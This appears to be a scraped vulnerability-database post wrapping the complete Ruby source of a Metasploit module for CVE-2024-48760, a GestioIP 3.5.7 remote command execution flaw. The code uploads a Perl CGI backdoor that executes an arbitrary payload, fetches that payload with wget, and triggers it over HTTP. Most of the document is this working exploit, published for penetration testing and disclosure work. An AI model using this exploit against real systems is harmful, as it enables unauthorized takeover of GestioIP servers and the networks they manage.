{“lastseen”:”2026-05-14T19:28:01″,”description”:”This module exploits a command execution via file upload. If GestioIP is configured to use no authentication for admin account, no password is required to exploit the vulnerability. Otherwise, an authenticated user with admin right on the web site is…”,”published”:”2026-05-14T19:00:11″,”modified”:”2026-05-14T19:00:11″,”type”:”metasploit”,”title”:”GestioIP 3.5.7 Remote Command Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-HTTP-GESTIOIP_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-48760″],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Msf::Exploit::CmdStager\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘GestioIP 3.5.7 Remote Command Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits a command execution via file upload.\\n If GestioIP is configured to use no authentication for admin account,\\n no password is required to exploit the vulnerability. Otherwise, an authenticated\\n user with admin right on the web site is required to exploit.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘maxibelino’, # Original finder of CVE-2024-48760\\n ‘odeez24’ # Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [ ‘CVE’, ‘2024-48760’ ],\\n [ ‘URL’, ‘https:\/\/github.com\/maxibelino\/CVEs\/tree\/main\/CVE-2024-48760’]\\n ],\\n ‘Platform’ =\\u003e [ ‘linux’ ],\\n ‘Targets’ =\\u003e [\\n [\\n ‘Linux\/unix Command’,\\n {\\n ‘Arch’ =\\u003e [ ARCH_CMD ],\\n ‘Platform’ =\\u003e [‘linux’],\\n ‘Type’ =\\u003e :nix_fetch,\\n ‘DefaultOptions’ =\\u003e {\\n ‘FETCH_COMMAND’ =\\u003e ‘WGET’,\\n ‘FETCH_DELETE’ =\\u003e true\\n }\\n }\\n ]\\n ],\\n ‘Privileged’ =\\u003e false,\\n ‘DisclosureDate’ =\\u003e ‘2025-01-14’,\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘Notes’ =\\u003e {\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [IOC_IN_LOGS, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘USERNAME’, [true, ‘The username to auth as with admin right’, ‘gipadmin’]),\\n OptString.new(‘PASSWORD’, [true, ‘The password to auth with’, ”]),\\n ]\\n )\\n end\\n\\n def backdoor_content(payload = nil)\\n \\u003c\\u003c~PERL\\n #!\/usr\/bin\/perl -w\\n\\n use strict;\\n\\n print \\”Cache-Control: no-cache\\\\n\\”;\\n print \\”Content-type: text\/html\\\\n\\\\n\\”;\\n\\n system(q(#{payload}));\\n PERL\\n end\\n\\n def original_content\\n \\u003c\\u003c~’PERL’\\n #!\/usr\/bin\/perl\\n\\n use Cwd;\\n use CGI;\\n\\n my $debug = 1;\\n my $q = new CGI;\\n\\n my ($status, $message, $exit);\\n my $output_type_header = \\”text\/xml\\”;\\n $exit = 0;\\n\\n my $filename = $q-\\u003eparam(\\”file_name\\”) || \\”\\”;\\n\\n print STDERR \\”FOUND FILENAME: $filename\\\\n\\” if $debug;\\n\\n if ( $filename !~ \/^[A-Za-z0-9-_.]+$\/ ){\\n $message = \\”ERROR: only the following characters are allowed for file_name: A-Z,a-z,0-9,-,_,.\\”;\\n $status =\\”400 Bad Request\\”;\\n $exit = 1;\\n printResponse(\\n message =\\u003e \\”$message\\”,\\n status =\\u003e \\”$status\\”,\\n exit =\\u003e \\”$exit\\”,\\n );\\n }\\n\\n $POST_MAX=1024 * 10000; # 10MB max\\n my $content_length = defined $ENV{‘CONTENT_LENGTH’} ? $ENV{‘CONTENT_LENGTH’} : 0;\\n if (($POST_MAX \\u003e 0) \\u0026\\u0026 ($content_length \\u003e $POST_MAX)) {\\n $message = \\”ERROR: Upload is limited to a file size of max. 10MB\\”;\\n print STDERR \\”$message\\\\n\\” if $debug;\\n $status =\\”500 Internal Server Error\\”;\\n $exit = 1;\\n printResponse(\\n message =\\u003e \\”$message\\”,\\n status =\\u003e \\”$status\\”,\\n exit =\\u003e \\”$exit\\”,\\n );\\n }\\n\\n my $lightweight_fh = $q-\\u003eupload(‘leases_file’);\\n\\n\\n\\n if (defined $lightweight_fh) {\\n\\n print STDERR \\”HANDLE DEFINED\\\\n\\” if $debug;\\n\\n # Upgrade the handle to one compatible with IO::Handle:\\n my $io_handle = $lightweight_fh-\\u003ehandle;\\n\\n my $file = ‘\/usr\/share\/gestioip\/var\/data\/’ . $filename;\\n open (OUTFILE,’\\u003e’, \\”$filename\\”) or $message = \\”ERROR: can not open file to write: $!\\”;\\n\\n if ( $message ) {\\n print STDERR \\”$message\\\\n\\” if $debug;\\n $status =\\”500 Internal Server Error\\”;\\n $exit = 1;\\n printResponse(\\n message =\\u003e \\”$message\\”,\\n status =\\u003e \\”$status\\”,\\n exit =\\u003e \\”$exit\\”,\\n );\\n }\\n\\n while ($bytesread = $io_handle-\\u003eread($buffer,1024)) {\\n print OUTFILE $buffer;\\n }\\n\\n close OUTFILE;\\n\\n } else {\\n print STDERR \\”NO HANDLE DEFINED\\\\n\\” if $debug;\\n $message = \\”ERROR: No leases file received\\”;\\n $status =\\”400 Bad Request\\”;\\n $exit = 1;\\n printResponse(\\n message =\\u003e \\”$message\\”,\\n status =\\u003e \\”$status\\”,\\n exit =\\u003e \\”$exit\\”,\\n );\\n }\\n\\n\\n $status =\\”200 OK\\”;\\n printResponse(\\n message =\\u003e \\”OK\\”,\\n status =\\u003e \\”$status\\”,\\n exit =\\u003e \\”$exit\\”,\\n );\\n\\n\\n\\n ###################\\n #### Subroutines\\n ###################\\n\\n sub printResponse {\\n my %args = @_;\\n\\n my $status = $args{status} || \\”\\”;\\n my $message = $args{message} || \\”\\”;\\n my $exit = $args{exit} || 0;\\n\\n my $output = \\”\\”;\\n $output .= \\”\\u003c?xml version=’1.0′ encoding=’UTF-8′?\\u003e\\\\n\\”;\\n $output .= \\”\\u003cResult\\u003e\\\\n\\”;\\n $output .= \\” \\u003cMessage\\u003e$message\\u003c\/Message\\u003e\\\\n\\”;\\n $output .= \\”\\u003c\/Result\\u003e\\\\n\\”;\\n\\n printHtmlHeader(\\n type =\\u003e \\”$output_type_header\\”,\\n status =\\u003e \\”200 OK\\”,\\n );\\n\\n print $output;\\n\\n exit $exit;\\n }\\n\\n sub printHtmlHeader {\\n my %args = @_;\\n\\n my $type = $args{type} || \\”\\”;\\n $type = \\”-type =\\u003e \\\\\\”$type\\\\\\”\\” if $type;\\n my $status = $args{status} || \\”\\”;\\n $status = \\”-status =\\u003e \\\\\\”$status\\\\\\”\\” if $status;\\n\\n my $header_params = $type . \\”,\\” . $allow . \\”,\\” . $location . \\”,\\” . $status;\\n $header_params =~ s\/^,\/\/;\\n $header_params =~ s\/,$\/\/;\\n\\n print $q-\\u003eheader( eval($header_params) );\\n }\\n\\n #curl \\\\\\n # -F \\”userid=1\\” \\\\\\n # -F \\”filecomment=This is an image file\\” \\\\\\n # -F \\”image=@\/home\/user1\/Desktop\/test.jpg\\” \\\\\\n # localhost\/uploader.php\\n PERL\\n end\\n\\n def check\\n print_status(‘Checking if the target is reachable…’)\\n if upload_file(‘README_server.txt’, ”)\\n return Exploit::CheckCode::Vulnerable(‘File upload successful, the target is vulnerable GestioIP’)\\n end\\n\\n Exploit::CheckCode::Safe(‘Target is not vulnerable’)\\n end\\n\\n # Upload the file on the target server\\n #\\n # @param filename [String] the filename to upload\\n # @param content [String] the content\\n # @return [Boolean] true if the file was successfully uploaded, false otherwise.\\n def upload_file(filename, content)\\n data = Rex::MIME::Message.new\\n data.add_part(\\n filename,\\n nil,\\n nil,\\n ‘form-data; name=\\”file_name\\”‘\\n )\\n data.add_part(\\n content,\\n ‘application\/x-httpd-cgi’,\\n nil,\\n \\”form-data; name=\\\\\\”leases_file\\\\\\”; filename=\\\\\\”#{filename}\\\\\\”\\”\\n )\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/upload.cgi’),\\n ‘ctype’ =\\u003e \\”multipart\/form-data; boundary=#{data.bound}\\”,\\n ‘data’ =\\u003e data.to_s,\\n ‘authorization’ =\\u003e basic_auth(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n })\\n if res\\u0026.code == 200\\n if res.body.include?(‘ERROR’)\\n return false\\n end\\n\\n return true\\n elsif res.code == 401\\n print_error(‘Authentification refused, Please give valid admin login informations’)\\n return false\\n else\\n return false\\n end\\n end\\n\\n # Upload the payload for linux system to the target.\\n def execute_linux\\n print_status(‘Executing payload on the target server …’)\\n send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘\/api\/upload.cgi’),\\n ‘authorization’ =\\u003e basic_auth(datastore[‘USERNAME’], datastore[‘PASSWORD’])\\n })\\n print_good(‘Payload successfully executed’)\\n end\\n\\n # Restore the original content of the target_link to remove the backdoor\\n # script.\\n def on_new_session(session)\\n super\\n begin\\n print_status(‘Cleaning up backdoor file on target server …’)\\n if session.type == ‘meterpreter’\\n session.fs.file.rm(‘README_server.txt’)\\n session.fs.file.new(‘upload.cgi’, ‘wb’).write(original_content)\\n fd.close\\n else\\n session.shell_command_token(‘rm README_server.txt’)\\n session.shell_command_token(\\”echo #{Base64.strict_encode64(original_content)} | base64 -d \\u003e upload.cgi\\”)\\n end\\n print_good(‘Backdoor file successfully removed’)\\n end\\n end\\n\\n # Main method to run the exploit.\\n def exploit\\n print_status(‘Upload the backdoor file …’)\\n content = backdoor_content(payload.encoded)\\n unless (upload_file(‘upload.cgi’, content))\\n fail_with(Failure::NotVulnerable, ‘Unable to upload the backdoor file’)\\n end\\n print_good(‘Backdoor file successfully uploaded’)\\n execute_linux\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/http\/gestioip_rce.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/http\/gestioip_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-14T19:28:01″,”description”:”This module exploits a command execution via file upload. If GestioIP is configured to use no authentication for admin account, no password is required to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-54600","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n